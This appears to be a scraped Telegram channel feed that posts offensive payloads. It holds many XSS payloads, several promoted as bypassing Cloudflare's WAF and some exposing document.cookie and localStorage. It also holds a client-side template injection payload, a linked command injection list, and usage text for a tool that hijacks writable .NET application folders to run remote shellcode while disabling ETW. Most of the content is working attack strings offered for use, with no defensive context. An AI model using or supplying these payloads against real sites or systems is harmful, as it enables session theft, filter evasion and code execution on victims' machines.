Xss Payload
#Xss #Payload➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
<input/onmouseover="javaSCRIPT:confirm(1)”
#Xss #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
BugCod3#shellter #msf #payload #bind
Please open Telegram to view this post
VIEW IN TELEGRAM
Cloudflare bypass XSS payloads
Tested On:👩💻
XSS Payloads:
#Exploit #XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Tested On:
XSS Payloads:
for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<svg/OnLoad="`${prompt``}`">#Exploit #XSS #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3 3⚡2❤2
New xss payload to bypass cloudflare WAF
#XSS #Payload #Bypass #CF #WAF
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
#XSS #Payload #Bypass #CF #WAF
Please open Telegram to view this post
VIEW IN TELEGRAM
Command Injection Payload List
⬇️ Download
#Payload #Command #Injection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
#Payload #Command #Injection
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1🔥1
Tools to automate finding AppDomain hijacks and generating payloads from shellcode.
Run this tool on the target. It will search recursively in the
C:\ directory for .NET managed `.exe`s and test if the folder is writeable - indicating that the PE is AppDomainHijack-able.AutoDomainHijack.exe (--version | -h | --help)
-t, --target-name=<target-name> Name of the target managed .exe to hijack.
-n, --hijack-name=<hijack-name> Name of the hijacker .dll.
-u, --url=<url> URL of the remote shellcode to run.
-f, --file=<file> File containing the shellcode to embed.
-o, --output=<output> Full directory to write files to.
-e, --etw=<etw> Disable ETW. [default: true]
--version Prints version
-h, --help Show help message
nimble build
BugCod3#Hijack #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1❤🔥1🤣1
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background
Payload :
#BugBounty #Tips #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o#BugBounty #Tips #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10⚡2❤1
CloudFlare Payload
#Payload #Cloudflare #Pentest
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 t.iss.one/BugCod3
📣 t.iss.one/A3l3_KA4
<svg%0Aonauxclick=0;[1].some(confirm)//<svg onload=alert%26%230000000040"")><svg onx=() onload=(confirm)(1)><svg onx=() onload=(confirm)(document.cookie)><svg onx=() onload=(confirm)(JSON.stringify(localStorage))>#Payload #Cloudflare #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6🔥3⚡2👍1
Cross Site Scripting Xss Payload
Payload:
#XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Payload:
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--#XSS #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1
payload
#Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))"><img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">#Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1